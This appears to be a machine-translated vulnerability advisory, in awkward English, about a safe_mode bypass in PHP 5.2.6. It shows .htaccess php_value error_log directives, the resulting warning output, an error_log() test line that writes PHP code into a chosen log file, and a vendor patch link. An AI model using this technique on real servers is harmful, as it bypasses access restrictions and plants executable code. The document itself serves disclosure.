Issues the date: 2008-11-20
Renewal date: 2008-11-21
Is affected the system:
PHP PHP 5.2.6
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 32383
PHP is the widespread use general goal script language, the especially qualify in the Web development, may insert to HTML.
When uses safe_mode by the overall situation pattern:
php.ini­:
safe_mode = On
And stated through php_admin_flag:
<Directory “/www " >
…
php_admin_flag safe_mode On
</Directory>
When founds some php script in /www/ and attempts to transfer:
ini_set (“error_log”,” /hack/ “);
Or in /www/.htaccess
php_value error_log “/hack/bleh.php”
The result is:
Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not \
allowed to access /hack/ owned by uid 1001 in Unknown on line 0
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script \
whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php \
on line 4
This is because in php.ini stated safe_mode. But if in the httpd.conf use:
php_admin_flag safe_mode On
Only will obtain:
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script \
whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php \
on line 4
in .htaccess permits php_value error_log “/hack/blehx.php " the syntax, causes to bypass safe_mode the limit.
<* origin: Maksymilian Arciemowicz (max@jestsuper.pl)
Link: http://marc.info/?l=bugtraq&m=122720980532226&w=2
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!
error_log (“<? php phpinfo(); ? >”, 0);
Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:
PHP
---
At present the manufacturer had already issued the promotion patch repairs this security problem, welcome to manufacturer main page downloading:
http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup
|